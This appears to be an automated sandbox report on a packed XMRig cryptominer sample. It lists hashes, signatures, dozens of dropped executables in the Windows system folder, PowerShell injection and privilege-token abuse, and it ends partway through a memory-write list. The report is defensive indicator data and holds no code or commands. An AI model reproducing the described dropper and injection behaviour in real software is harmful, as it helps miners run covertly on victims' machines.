Malware Analysis Report

2025-04-19 17:56

Sample ID 240527-fbwgsshe79
Target 1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe
SHA256 d734508378d4fcbe4c1d5a9b8c0228246ea758ef9826978f615d6f3c5eb9ed04
Tags
miner upx xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d734508378d4fcbe4c1d5a9b8c0228246ea758ef9826978f615d6f3c5eb9ed04

Threat Level: Known bad

The file 1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution

XMRig Miner payload

xmrig

Xmrig family

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

UPX packed file

Loads dropped DLL

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 04:42

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 04:42

Reported

2024-05-27 04:45

Platform

win7-20231129-en

Max time kernel

150s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\MTKniSn.exe N/A
N/A N/A C:\Windows\System\pxtdjGC.exe N/A
N/A N/A C:\Windows\System\AtzgPFc.exe N/A
N/A N/A C:\Windows\System\cJtPwoD.exe N/A
N/A N/A C:\Windows\System\cMKesTQ.exe N/A
N/A N/A C:\Windows\System\pWDiXOP.exe N/A
N/A N/A C:\Windows\System\eniyzxk.exe N/A
N/A N/A C:\Windows\System\MbDdCML.exe N/A
N/A N/A C:\Windows\System\gfifTGX.exe N/A
N/A N/A C:\Windows\System\AxZpdxI.exe N/A
N/A N/A C:\Windows\System\miPikZW.exe N/A
N/A N/A C:\Windows\System\lLFvILn.exe N/A
N/A N/A C:\Windows\System\VfYCcpI.exe N/A
N/A N/A C:\Windows\System\Ohxqjpo.exe N/A
N/A N/A C:\Windows\System\myHSYnJ.exe N/A
N/A N/A C:\Windows\System\bYIjiUg.exe N/A
N/A N/A C:\Windows\System\GxmpAVc.exe N/A
N/A N/A C:\Windows\System\kZwvbGv.exe N/A
N/A N/A C:\Windows\System\JWNZCID.exe N/A
N/A N/A C:\Windows\System\HYMTyuY.exe N/A
N/A N/A C:\Windows\System\wBlWqsq.exe N/A
N/A N/A C:\Windows\System\NsfWPyP.exe N/A
N/A N/A C:\Windows\System\wbpEhET.exe N/A
N/A N/A C:\Windows\System\ohMREop.exe N/A
N/A N/A C:\Windows\System\zYMRSKr.exe N/A
N/A N/A C:\Windows\System\TVQopmo.exe N/A
N/A N/A C:\Windows\System\mRvlMfx.exe N/A
N/A N/A C:\Windows\System\qUrNGnf.exe N/A
N/A N/A C:\Windows\System\OeQVnBU.exe N/A
N/A N/A C:\Windows\System\eTvIGnS.exe N/A
N/A N/A C:\Windows\System\XZhdYTJ.exe N/A
N/A N/A C:\Windows\System\fJqlTdu.exe N/A
N/A N/A C:\Windows\System\CvJIEqE.exe N/A
N/A N/A C:\Windows\System\dZtxZtG.exe N/A
N/A N/A C:\Windows\System\gukucQB.exe N/A
N/A N/A C:\Windows\System\znBSpUi.exe N/A
N/A N/A C:\Windows\System\Woubika.exe N/A
N/A N/A C:\Windows\System\dxeGROM.exe N/A
N/A N/A C:\Windows\System\iWtRksB.exe N/A
N/A N/A C:\Windows\System\GSWMVlh.exe N/A
N/A N/A C:\Windows\System\hqdIPCD.exe N/A
N/A N/A C:\Windows\System\MkeeKvk.exe N/A
N/A N/A C:\Windows\System\QXRgagH.exe N/A
N/A N/A C:\Windows\System\CwAZcPb.exe N/A
N/A N/A C:\Windows\System\dAHXGvS.exe N/A
N/A N/A C:\Windows\System\zGCnmuO.exe N/A
N/A N/A C:\Windows\System\qRKYSNO.exe N/A
N/A N/A C:\Windows\System\kffqQgT.exe N/A
N/A N/A C:\Windows\System\TJCVtQF.exe N/A
N/A N/A C:\Windows\System\rIjDuZE.exe N/A
N/A N/A C:\Windows\System\bwTKWzG.exe N/A
N/A N/A C:\Windows\System\YkTxmwQ.exe N/A
N/A N/A C:\Windows\System\TbMsZPr.exe N/A
N/A N/A C:\Windows\System\GSQgUry.exe N/A
N/A N/A C:\Windows\System\oogqQLf.exe N/A
N/A N/A C:\Windows\System\sfTKGcc.exe N/A
N/A N/A C:\Windows\System\LraukvS.exe N/A
N/A N/A C:\Windows\System\hJIXtQH.exe N/A
N/A N/A C:\Windows\System\ZQcIJTP.exe N/A
N/A N/A C:\Windows\System\JatFuUV.exe N/A
N/A N/A C:\Windows\System\UrbqSKu.exe N/A
N/A N/A C:\Windows\System\SFPlAVk.exe N/A
N/A N/A C:\Windows\System\ElSNksp.exe N/A
N/A N/A C:\Windows\System\HLHoaPJ.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\HaHJJDR.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rquQsrm.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zCuVZfS.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AykqVnQ.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ntZikNT.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PLAgtEc.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rUZaFOk.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\unKKPqo.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FReqWMp.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TSCWjOY.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wqdemGN.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\cqnUJRC.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gryTNpa.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xCwXTZI.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ipbPvAF.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lEGCKVO.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hHCXTvE.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IvgUXDW.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\obqufoA.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EWUxWaF.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hMPqeKN.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KtWqXzW.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hlvlCnZ.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bUlTPqV.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QMYIunH.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GShoYpr.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\eYgfPsq.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PnglBoz.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NimXAdu.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gHWsBkT.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HdwadfY.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NKYqAYD.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\deVlPYw.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FknBREK.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CjzscBx.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\uhJckCY.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JzuUzaw.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nnWWDwp.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\unHcHjY.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EPwSHUy.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XRzsNZM.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tYWQsMU.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WAwLKnU.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\dybkHXp.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MCVyzgD.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\fznrIsJ.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\sLBbGmc.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\fVgmwlC.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TJLMlDJ.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vkHfsWG.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\DxZTJrX.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\quoeiRl.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FymcSMB.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AcNZRwO.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\daWrgDu.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hiXczpG.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tBUSdAH.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\peFCJgW.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bRNuzQX.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CRlZMxb.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WgoGghf.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FJiNUNU.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zanpxaJ.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RUAewpm.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2352 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2352 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2352 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2352 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\MTKniSn.exe
PID 2352 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\MTKniSn.exe
PID 2352 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\MTKniSn.exe
PID 2352 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\AtzgPFc.exe
